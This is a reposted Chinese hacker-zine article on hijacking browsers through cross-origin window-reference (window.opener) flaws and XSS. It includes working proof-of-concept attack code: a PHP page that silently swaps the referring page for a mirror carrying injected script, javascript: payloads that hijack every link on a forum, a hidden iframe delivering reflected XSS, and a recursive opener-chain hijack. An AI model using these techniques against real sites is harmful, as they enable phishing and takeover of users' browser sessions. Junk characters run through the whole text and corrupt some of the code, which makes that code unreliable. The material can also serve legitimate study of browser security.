==Ph4nt0m Security Team==
+ j7 B2 X' f# w6 Q 6 G1 k7 ^8 J3 i7 H7 Z6 b1 i
Issue 0x03, Phile #0x05 of 0x07
' }) I$ m% \% N5 f& u8 `
- x1 q4 \, N4 u4 _+ W x! w, q U" v2 o- {5 A! K: E& A5 E
|=---------------------------------------------------------------------------=|0 d# |% K4 D6 o# Z6 O! j
|=---------------=[ 利用窗口引用漏洞和XSS漏洞实现浏览器劫持 ]=---------------=|+ O: \3 J& ~4 A8 s# o
|=---------------------------------------------------------------------------=|/ L$ V# ~* v) q+ t7 ~
|=---------------------------------------------------------------------------=|) i+ D9 S# f! S4 r5 [/ R
|=------------------------=[ By rayh4c ]=---------------------------=|
: S9 H+ T* b9 r9 O% ^3 a7 V|=----------------------=[ <rayh4c#80sec.com> ]=------------------------=|
& z4 v( W5 _: C# E1 [4 K1 q|=---------------------------------------------------------------------------=|
: I4 O6 w- E5 P% `9 P# b% z+ e) Z2 F* h! \) L$ H/ e2 K! H
8 \& n7 f- H4 d4 ~# l' o/ X
[目录]5 _" V+ z' F9 u, o2 l: A) d- a
3 j. n @4 Y) K3 e8 v' u
1. 前言7 N% t7 b5 O; K5 g0 K+ u1 f w( G
2. 同源策略简叙
7 d: p# @0 D" e, I- X" N7 N0 i3. 理解window对象的同源策略
) Q! K$ Y+ o4 J O4. 窗口引用功能中的同源策略漏洞
e" d8 ?8 K3 l% ^( E8 u 4.1 父窗口引用子窗口的同源策略问题" ?3 S8 T/ o, C8 t
4.2 子窗口引用父窗口的同源策略问题
5 e0 f! H8 L; Q9 h% `" s, _- Z5 `5. 利用窗口引用漏洞劫持浏览器2 y- D2 A7 h5 L* D$ g5 o# S1 z. T5 d5 f
6. 利用XSS漏洞劫持浏览器( L/ l$ G! w; v& \% _
6.1 正向跨窗口劫持
6 W* H( N) p" \9 H3 _0 k: x9 ` 6.2 反向跨窗口劫持# W3 R1 \' ~: J2 L' X
6.3 极度危险的跨框架窗口引用劫持5 m3 v/ Z0 ^( O: H3 Z! C
6.4 极度危险的正反向跨窗口递归劫持+ O! k/ m) o6 f7 L2 J$ S
6.5 完全控制浏览器
8 c6 }! y5 n& {# ], `& n* @7. 后记
! E6 _6 C2 M: F5 `" T8. 参考
6 O7 l$ N/ _) i3 l/ x' ? X, ~- I
3 q2 M% N# N4 g$ l
$ J/ `, i7 Z Z9 M$ Z4 F一、前言
! a5 b! ]- M* H! b" [1 V2 K, L. W7 ~% x: d& K* y. s4 x- q+ V, l
最近国内关于XSS漏洞的技术文档都比较少,所以决定写这篇文档,其中的很多细节和朋
! [3 W, g( ~9 h: o2 P% _友们都沟通讨论很久了,其中包括了我对浏览器同源策略和XSS的一些理解。XSS漏洞从Session
' V2 ^* B s9 q) ?, t6 |/ f4 R劫持、钓鱼、XSS WORM等主流攻击方式发展到现在,告诉了大家一个真正的跨站师是不会被
: P& s" p4 ^- l, L4 ~8 ~条条框框所束缚,跨站师们在不断的创新,跨站师们会展示XSS漏洞的所有可能。
1 p) \# ~, q8 ^. S; O% } A
0 R1 p& j! R. H1 g" Y
: j* O$ b; O0 U$ g/ S二、同源策略简叙
0 }& J- O! t8 [+ }( s* G
. q& g- B$ c0 v/ R7 d 同源策略是浏览器的安全基础,它是浏览器支持的客户端脚本的重要安全标准,我们可以
5 t# a m, h% [2 ~8 X# R, T7 ^* q从“源”上了解这一安全标准,按照W3C的标准这个“源”包括域名、协议和端口,各大浏览器都0 |' x+ s9 j. M7 [
曾爆出过很多同源策略漏洞,危害程度各有不同,比如从06年开始流行至今的MS06-014网页木# p' m+ O( p) g& P# V
马漏洞都已经完全颠覆了同源策略。这次的文档主要说的是DOM的同源策略(参考2)中的一个) X! u0 `4 c5 m& Z
漏洞,然后从漏洞引申到XSS漏洞如何利用DOM的同源策略特性,最终实现浏览器劫持。# @# ~- ]" g/ a" S( i
! l3 k9 y" x0 H8 o( ?! T3 a8 R& c1 o9 G4 g
三、理解window对象的同源策略( D! v/ D. a8 W2 r# N; p9 W6 ~; g8 d
' x% x' Q0 h5 M4 g0 h4 [ 窗口即指的是浏览器窗口,每个浏览器窗口都可以使用window对象实例来表示,window对
& N; d9 j. ]& ]" U0 |$ |" e象有很多属性和方法,写一个简单的脚本可以历遍出window对象的所有属性和方法:7 e& C+ s1 b. }: z7 ?8 Y9 |
+ x; I) i: ?8 Q2 ]9 M% g v--code-------------------------------------------------------------------------, q0 |( ?# A9 a& I+ ~4 W3 W
<script language="javascript">0 O9 [: m8 j2 }& H
for(p in window) document.write(p+"<br>");9 R. q) N4 w8 h3 M1 \
</script>
; Y+ W! V: O; a( ]: y4 q1 B-------------------------------------------------------------------------------! A; R. x `# }8 ]
, a; Y3 D2 ^/ [8 Y# @0 P
这些window对象的属性和方法可以改变窗口的外观和窗口网页的内容,当这些属性和方
. t5 _3 k4 \" ?& d" r, Q; l法只在一个窗口中使用并不会凸显出安全问题,但是当多个window对象开始互相引用的时候,; D* S0 t' \, H
这些属性和方法就必须遵循同源策略。
0 Q& ~5 E, u' i
|/ F2 `* \# j6 q7 d. |. \# S/ [ 举一个简单的例子,如果在a.com的网页可以调用b.com网页window对象的属性和方法,那
! `' [# N1 z% I么跨站师就可以随便XSS互联网上任何一个网站了,所以为了避免安全问题,同源策略是必须9 _1 L1 M S& {, X
的。我们可以把下面的脚本保存为demo.html到本地打开或者丢到远程服务器上进行测试,这! w1 B6 O7 S. J f
个脚本的效果是调用不同源的子窗口window对象的属性和方法,我们会发现location属性的! j1 e7 {7 U. N! p' u9 c* }
值类型是空白的,这种情况太特殊了,说明不同源的父窗口引用子窗口window对象的location; o$ {6 u* A' C3 {/ o2 |
属性并没有被拒绝访问。
" O! j$ S/ x% |+ |1 O: I4 L( t7 `
- T9 n r7 O/ i* ?--demo.html--------------------------------------------------------------------2 d! [# l* ^ f& y& w, n
<script language="javascript">
. r- o6 W/ Y; r) ^8 L' ]: ]function allPrpos(obj) { # _- b, {8 _# X Q7 I
var props = "<table><tr><td>名称</td><td>值</td>";
) a0 n" f9 F. X" j7 M for(var p in obj){ . J# j1 e" z; c* c, m; v9 e
if(typeof(obj[p])=="function"){
: Z! K1 U; Z$ G obj[p](); % {$ e# A1 g0 d- S7 D
}else{
, X7 z" r `9 l, j5 S2 E try / k! Q) T6 s) c6 z
{ ! U) q6 z/ _+ R. }1 h' L* x( U
props+="<tr><td>"+p + "</td><td>" + obj[ p ] + "</td></tr>"; $ u* M f* K7 c& b7 M
}
n1 J# R; O+ D3 G( n catch (ex) 0 u/ h5 ~* r% f3 b) b6 ]
{ ; _- ^3 N( [# y# N" A! z. Q# _ q
; @% J4 v/ F* t1 B, ~5 @6 d" d
props+= "<tr><td>"+p + "</td><td>" +ex.message+"</td></tr>"; - E- }; i9 x% G5 A1 w4 j/ m
}
& t" _5 f) b0 e! V
6 m! Q! R- c4 z. F }
+ x4 r0 m4 c, Q }
6 N1 Q4 c1 A' P Q
. e$ h8 T2 f/ Q1 x6 I3 a9 B document.write(props+"</table>"); . b5 X4 g8 V( D9 o# |9 S
}
; e( Z: Q7 b* x9 {3 t5 C ' i* s9 L3 \0 n. }3 k
function createWin() {; Z n* t" ?6 M3 f" h( ]0 X7 `
newWin = window.open ("http://www.google.com");
6 G5 ]0 U0 i% \" V3 X* p8 s9 E5 T setTimeout(function(){allPrpos(newWin)},2000); # |; ]) D: [' O) ~7 K
}
- F; ^5 e% V) F
4 p# }9 }- w! q$ u8 w# R</script> $ F# `$ _1 ]. I4 u0 P! I
N1 R- B0 @: \<button onclick='createWin()'>创建一个非同源子窗口测试</button>
' v# F( {; i' ?4 ~-------------------------------------------------------------------------------
! V% }. y# z8 i- ?, A+ L4 V9 A! Z( s* Z1 _" u
2 `/ a# q. T- H: _8 p0 \( Z
四、窗口引用功能中的同源策略漏洞) i, a4 W/ ^( E& _9 ?1 g
c0 U, G+ }$ J5 Q, K7 I/ _
4.1 父窗口引用子窗口的同源策略问题) w" d& Q+ ^8 ~
9 o( _7 C$ T! F3 E; l) L- y
去年我在幻影杂志发过的IE6跨域脚本漏洞,这个问题微软已经发布了ms08-058补丁修复,
0 G3 q1 {4 m) O S7 L但这个漏洞仍然暴露了父窗口引用子窗口的同源策略问题。根据第二部分的测试,我们知道
* l0 k1 z( A& W9 m" F浏览器并没有阻止父窗口访问非同源子窗口的location属性值,我们可以使用下面的脚本进! c, G: }! f7 E# Q, @" }2 d, M5 y5 J
行测试,会发现父窗口可以控制非同源子窗口location属性值。: _$ Q* d+ b; v' E" e+ u( W
" C! u: q \0 Y--vul1.html--------------------------------------------------------------------# Z( M1 }" D4 K/ H9 G
<script language="javascript"> ! Q6 |. y' F# [' X0 _; z
function createWin() { ) D$ T" _$ Y1 f4 p
newWin = window.open ("http://www.google.com");
1 C: y6 _! L* E setTimeout(function(){newWin.location="http://www.80sec.com"},2000); j: F1 e5 F; h3 ~
}
) m8 g0 Y# k" W0 C; D3 s( e% @; `</script>+ T' d8 P8 R' O6 ?
f {, ?8 }' X<button onclick='createWin()'>创建一个非同源子窗口测试</button>3 }1 ~! X" s* v* W$ [+ P, g1 M
-------------------------------------------------------------------------------+ S" z. A+ c( y+ B& w t% O$ G
) t6 z+ o) F9 ^- `, b! b, `" N4 f
: g8 g2 T2 g6 o. |1 o5 H4.2 子窗口引用父窗口的同源策略问题
2 @: _# \: [% [5 R" L: A! [, S) L- l( V2 @
逆向测试一次会发现子窗口引用父窗口也存在同样的问题,这里为了更方便和直观我使
C8 l4 Q" P, ]! K+ ~- ]/ [5 H用javascript伪协议进行验证。子窗口引用父窗口的window对象属性是window.opener,我们, H2 n& c3 o( ?0 x9 U W# B
可以随意浏览一个网站点击链接打开N个网页,在这些网页的地址栏注入下面的脚本,你一定+ {5 c9 x1 H# n, Q5 g! F( d/ X
会惊奇的发现,不管同源还是非同源的父窗口都转跳到了80SEC网站。# b/ \7 j4 w z: B N3 ?8 g
/ s9 Q( q" @# q. G: Q% P
--code-------------------------------------------------------------------------* B- D" C' A9 B( e
0 ^& j9 l# J" z$ d. V) B
javascript:window.opener.location = "http://www.80sec.com";void(0);$ Y$ Y( x& e) \0 i7 V( w2 \
- ]' ?/ ? B7 O! A [, f2 Q+ x4 h-------------------------------------------------------------------------------: {" H/ o4 @8 z6 H8 Y' G/ ? C
" W l# `+ e2 p9 T6 K1 r$ V) r% {. @% I
c; ^6 y! {1 a( V五、利用窗口引用漏洞劫持浏览器
, Q/ ^! `' d# X8 O
9 G! Y2 K4 s$ \5 L, g8 I: @ 经过上面三个枯燥的测试,我们已经暴露了浏览器一个非常严重的安全问题,非同源的子
2 N- Y9 J$ Z5 j2 ` t窗口和父窗口可以互相引用控制window对象的location属性值,并没有严格遵循同源策略,那
f1 v1 e9 h- u2 }) F3 D) C* Q么用户在浏览器中的所有点击行为都有可能被跨站师变相控制。
( ?! o7 b6 ~) R; s; a: l+ y
6 _! f; {- e Q2 | 我们打开浏览器访问互联网上的各个网站,无时无刻不在点击链接,我们点击链接想要产
1 N8 {- O3 L& M4 y生的结果是去访问我们想要去的URL地址,用户的正常点击只会产生两个结果,打开新窗口或 d$ a4 x4 e9 } y* k
者当前窗口转跳,试想一下你在SNS网站、电子商务网站、BLOG、论坛里点击一个正常的链接
& T$ L) v: T. l! W后,打开了一个“无害”的网页,原本浏览的信任网页却已经被悄悄替换了,大家可以联想一下: w2 ^. o, E6 |0 [; W
会产生什么可怕的后果。
( O$ x: i! b ^) m y
( j0 n$ t s* L Y4 l 下面我写了一个劫持浏览器的小Demo,思路是获取REFERER后生成镜像页面,同时加入我
0 |3 W5 J: O1 c+ P" w们的劫持脚本。比如把这个hjk_ref.php丢到本地服务器上测试,将http://127.0.0.1/hjk_ref.php, ^4 G- }5 A. W' R* i# G& v
这样的链接发到任意一个网站上,点击链接打开新窗口,当所有的注意力都停滞在新窗口的时7 \* s5 H! @3 @$ D
候,3秒后一个镜像页面将会悄悄替换链接所在页。按照类似的思路,发挥跨站师的想象力,可' R+ W5 O V: S2 B7 D# Y2 K
以做更多的事情,所有的一切仅仅是因为点击了一个链接。+ P [, |1 U4 }) Z, _
8 y! `2 Z$ s& P+ m
--hjk_ref.php------------------------------------------------------------------
1 C1 ]1 Z) @" a# Q0 `- B8 I" W8 n<?php
0 F% Y+ V2 ~" a7 S) D/ |2 dif (array_key_exists("HTTP_REFERER", $_SERVER)) {0 |) g9 ^, g% A, S: t) { o
$Url_Mirror = $_SERVER["HTTP_REFERER"];; E6 h1 J" ^5 X8 d; L p5 F% w9 p
}
0 \9 g' m6 i9 I- l6 gif(isset ($_GET['ref'])) {1 N8 Z1 J/ I* B
echo file_get_contents($_GET['ref']) . '<script>alert(\'I had been hijacking your browser!\')</script>';
9 l2 Q5 A! f W0 F}& X/ b5 e9 ^6 b( B0 [$ d8 Z2 j
?>% B( ^1 i8 k0 F" c; I
4 B# N4 I8 F# S
<script language="javascript">, N* l/ ~% x+ ?0 z1 x# z
setTimeout(function(){window.opener.location=window.location+"?ref=<?echo $Url_Mirror;?>"},3000); ) W! A; k$ X- i; ]% K
</script>% u) G* p: U* T% Y* R' u
-------------------------------------------------------------------------------
5 m+ t3 W8 g$ T6 V8 n2 h" G: e5 w; } ^. |; e5 {) U/ h
注:各大主流浏览器仅opera和internet explorer 8不存在窗口引用漏洞。
! ]1 f' k9 w2 }& i6 g3 j0 T3 [) c
: L- V) v9 b. E1 S6 |4 t
) D8 t- z6 T% ~六、利用XSS漏洞劫持浏览器) I! k e( i* k0 l( y( m
' i. e2 {5 ^* g" |0 A6 w" A& M
延续第四部分的思路,这部分将进入本文的一个重要环节.跨站师们都知道XSS漏洞分为
7 ~" I4 t9 |- [持久和非持久两种,这两种类型的漏洞无论怎么利用都无法跳出窗口的生命周期,窗口关闭后# m# B6 {2 u" ^6 [2 b9 I+ y
XSS漏洞的效果也就完全消失,窗口的限制一直束缚着跨站师们的发挥,我这里将和大家一起- J- F# _8 k& {9 d& b# O
讨论跨站师的终极技巧:; A& o+ K6 {6 T) o
( h1 C1 T1 v7 K: y$ m
( E5 g1 r& P5 z$ l' l6.1 正向跨窗口劫持
% T! q4 a( @' u# ^: E: G8 a
9 e# w: ]/ F# H- u5 p& M 大家可以先试验下hijack_open.js这个脚本,比如打开http://bbs.dvbbs.net/动网论坛; X4 T% ~0 @0 l, R4 I/ `* |' y n y
主页,我们在地址栏里复制下面的代码使用伪协议注入hijack_open脚本,然后整个页面的链) P$ u; b2 t. X a4 ~5 C
接就都被劫持住了,点击论坛里的任意一个链接,打开的新窗口都会被注入了一个alert对话" Q' C f4 w" m5 ^9 _2 n* C
框脚本。
9 u2 v7 e" j) P! N6 u. t, M6 ~6 R. M8 @" c4 _* V8 \
--hijack_open.js---------------------------------------------------------------* I+ y! \# `6 _1 M4 G
& y; d7 ` K5 |- ?& f8 _javascript:for(i=0;i<document.links.length;i++){document.links.onclick=function(){x=window.open(this.href);setTimeout(function(){try{x.location="javascript:alert('I had been hijacking your browser!')"}catch(e){};return false;},3000);return false;}};void(0);
/ [1 x( U- `4 K8 x- S/ \4 A: T8 _. ~- i+ l$ |
-------------------------------------------------------------------------------/ M- w3 G5 c0 N+ [6 q
; O% q. `$ V! C; r
6 Q! S% J* l/ K! j6.2 反向跨窗口劫持
( C4 M( O7 `- B0 M% u
& D7 D# m8 Y. a( ?9 t2 [- g 同样我们也可以在动网论坛试验,新打开任意一个版块的窗口,在地址栏里复制下面的代
F% x- H% L. m码使用伪协议注入hijack_opener脚本,我们会发现原来的页面被反向注入了一个alert对话
7 W5 X' s# U) M. g框脚本。( e0 l7 n5 f( g, s' M! W
+ ]$ x* H5 d+ S0 E( [6 ?
--hijack_opener.js-------------------------------------------------------------9 l8 Y% P$ Q2 R1 L5 D- I
. }( |" X( [' r7 V/ j+ Ejavascript:window.opener.location="javascript:alert('I had been hijacking your browser!')";void(0);
4 L' \3 y8 `& T8 }/ g4 Z4 S0 I1 a( J; Q7 _
-------------------------------------------------------------------------------) \: Z& x* I! _
5 n- d* E( C) ~" o8 W
+ j" I `7 v8 G& M& [4 \6.3 极度危险的跨框架窗口引用劫持 Z( [( {/ u+ i4 R1 R
! V1 Y- X- I8 N; h- ]
非持久型XSS漏洞是在URL参数中注入脚本,一度被认为很鸡肋,一个非持久型的XSS漏洞. G6 Y& j& d0 h6 Q) d5 m. c, F
可能出现URL参数过于冗长等缺点,下面这个window.parent.opener的跨框架窗口引用技巧就5 M1 P0 D% y5 V* R" d( M( B2 O9 U
适用于所有的非持久型XSS漏洞,我们可以在一个被攻击者的信任网站上的网页里iframe一个
& {& x% _3 N& q非持久型的XSS,如下:+ S8 \. Q. ?3 i3 Q: Y2 T k1 U
, Z- P! }6 |" p: |" h
<iframe src='http://www.target.com/index.php?vul=xss'width='0' height='0'>
3 |# S( I0 _2 g: |5 m( g$ u6 t. E" d. o& t) @6 l
在vul参数中写入下面的hijack_frame_opener脚本,跨站师就可以反向跨框架引用窗口
5 N2 i7 I7 l( R注入脚本。
`! M& D" Y% E, A1 a! G: H: b1 B
--hijack_frame_opener.js-------------------------------------------------------( w! W% E# o$ L; p
<script>
~4 b- ]; m B: D4 U+ R: mwindow.parent.opener.location="javascript:alert('I had been hijacking your browser!')";5 t9 {' \# W1 Q
</script>
! g5 H9 F# n& l. O! q1 n' B-------------------------------------------------------------------------------
9 L6 W% r$ Z: W0 \8 y# m$ j1 g
J+ W* c. \7 o: Y4 h( B/ i% T7 f r8 ^
6.4 极度危险的正反向跨窗口递归劫持
3 p, H* p/ `# i; E' r1 y5 a* N$ }3 S" T
luoluo建议我加上了这一部分,窗口之间的引用关系可能是复杂的,我们可以通过window
1 z. Y: s* j; Z的opener属性链反向递归查找窗口注入XSS脚本,将互相引用过的同域窗口全部劫持,并通过( t+ i0 B2 E7 H$ M
异常处理规避之间跨域页面的访问异常,代码如下:
: v. Y" x4 K2 T, U
# D: P1 L1 T8 F5 j) |; s, ]0 W--code-------------------------------------------------------------------------' y% V$ n; f1 _8 a2 T/ x
, W2 `) H/ a! R) i' d0 {9 Mjavascript function(){var w=window;while(w.opener){w=w.opener;try{w.location="javascript:alert('I had been hijacking your browser!');void(1);";}catch(e){}}})();void(0);) F0 E+ ?4 E& J* H0 r; z; k$ z
; d6 x& ^: |( f# J
-------------------------------------------------------------------------------
3 Y8 }# Q# `# ?2 _" U0 v. o. i$ l, W% @, t H" C8 S* M
假设页面打开序列有A域->B域->A域的情况,通过对第二个A域页面的反向递归劫持则可5 h6 u5 j1 ~* o2 Y p
以劫持B域之前的A域页面,从而实现“隔空打击”。
" y6 ]/ K4 W, k6 C: E
0 e: _0 w4 e; F4 i: v' O 同理,正向跨窗口劫持也可以实现递归劫持所有同域的链接,对每个打开的被劫持的页面0 x% j2 y8 _# C% q7 X; v. M, _/ k
执行和第一个页面一样的劫持脚本,但是正向递归没法实现反向递归的那种“隔空打击”。* Z7 R" O9 h& L, n7 u7 r) B- v
1 j' u- I+ ~4 c7 W& V
结合正向和反向的链式递归劫持,最终我们可以劫持所有的同域页面。0 ^" }1 J2 Q: ?3 y1 D/ u# ~
4 K2 x1 ]8 Y# J M3 Y% \: n
- T: W3 S; E, e6.5 完全控制浏览器
0 m M# u/ h$ V7 ^% [# {% D" F1 r, }. L+ X, ^: H
一个跨站脚本漏洞的真正意义在程序员的角度是输入和输出问题,而在跨站师的角度则
* Z# h' x, z* ^4 C# g6 j! v `+ t是能够进入同源策略了,可以摆脱同源策略的束缚做任何想做的事情。跨站师们可以利用XSS. W2 O+ Y2 O' P9 z6 P. z
漏洞在同源策略允许的范围内再跨页面注入脚本,可以不再为窗口关闭后XSS漏洞的效果消失 @/ |' |3 q, [# V/ Y% I/ }
而烦恼,劫持窗口后的跨站师们可以任意发挥,劫持表单,劫持请求,劫持输入等等,我就不再
5 D% S5 U; ?# |! E2 W% z列举实例。无论是持久型还是非持久型的XSS漏洞都是能够发挥最大的威力的,最后实现跨站0 ^- J( m$ N+ q* s- ^1 d
师的终极目标 - 完全控制浏览器。9 {5 ~ Z4 x6 d; ^
0 h8 _) ^- z$ H# O' a" b& P& @0 F; M( R! C
七、后记- v6 z6 F, ^0 q' R6 U* [
! w9 n: D" s' q3 U3 m0 J w 文章涉及的安全技术全部都是纯研究性质,请不要将这些技术使用在非法途径上。安全
+ H0 T& Q6 N% F. _ R6 s与应用永远是一个矛盾体,通往安全的路永远不止一条。感谢对这篇文档的思路和技术给予
+ ]+ T8 j/ }4 R! ]8 `0 k3 @过帮助的luoluo、cnqing、linx以及80Sec团队的所有成员。9 R; q( E V# ]5 ^* D+ c# D
' V V) u9 }* C3 D6 n4 i
, e& @6 U3 o8 }3 F$ d八、参考( A; @( G0 m6 a
4 ~6 J. D5 c1 w; g& p1. http://en.wikipedia.org/wiki/Same_origin_policy
: w8 }6 l, _" A8 a$ f9 N2. http://code.google.com/p/browser ... licy_for_DOM_access
5 {" a% z/ f) j8 r* m3. http://www.w3.org/TR/Window/
, A, v# ~! A/ u+ ] z7 C4. http://www.80sec.com/release/browser-hijacking.txt4 @2 Z, t Z! m7 c1 K3 a/ h2 q0 z0 [+ S
5. http://www.80sec.com/all-browser-security-alert.html( b1 h0 H, A9 r% O6 }0 y
6. http://www.80sec.com/ms08-058-attacks-google.html
+ g) v0 w9 ?9 v6 r' k. x' p0 Q: v4 K N P% l4 _5 C
-EOF- |
发表于 2012-9-13 17:10:56
收藏
支持
反对